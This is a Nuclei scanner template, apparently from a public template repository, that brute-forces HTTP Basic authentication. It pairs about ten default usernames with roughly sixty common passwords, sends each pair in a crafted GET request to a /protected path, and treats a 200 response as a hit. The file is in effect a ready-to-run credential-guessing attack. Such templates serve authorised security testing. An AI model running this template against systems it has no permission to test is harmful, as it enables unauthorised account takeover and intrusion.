nuclei-templates/fuzzing/basic-auth-bruteforce.yaml

98 lines
1.9 KiB
YAML

id: basic-auth-bruteforce
info:
name: Basic Auth Bruteforce
author: "@w4cky_"
severity: high
# Impotent Notes:-
# This is specific template to work with basic 401 authentication endpoint.
# Do not run this template on non basic authentication related endpoints to avoid false positive results.
requests:
- payloads:
username:
- admin
- manager
- administrator
- username
- login
- anonymous
- test
- guest
- root
- demo
password:
- admin
- pass1
- pass1
- root
- welcome
- p@ssw0rd
- user
- test
- testest
- dupa8
- admin123
- admin1234
- admin12345
- anonymous
- manager
- linux
- system
- oracle
- administrator
- 11111111
- qwerty123
- cisco123
- admin123456
- 1qazXSW@
- master
- 123qweasd
- 1qaz2wsx
- 123456789
- 1234567890
- !qaz@wsx
- !q@w
- wubao
- pa55w0rd
- 123abc
- 123456
- 123456789
- qwerty
- password
- 1111111
- 12345678
- abc123
- 1234567
- password1
- 12345
- 1234567890
- 123123
- 000000
- Iloveyou
- 1234
- 1q2w3e4r5t
- Qwertyuiop
- 123
- Monkey
- Dragon
- demo
attack: clusterbomb
raw:
- |
GET /protected HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username + ':' + password)}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0
Accept-Language: en-US,en;q=0.9
Connection: close
matchers:
- type: status
status:
- 200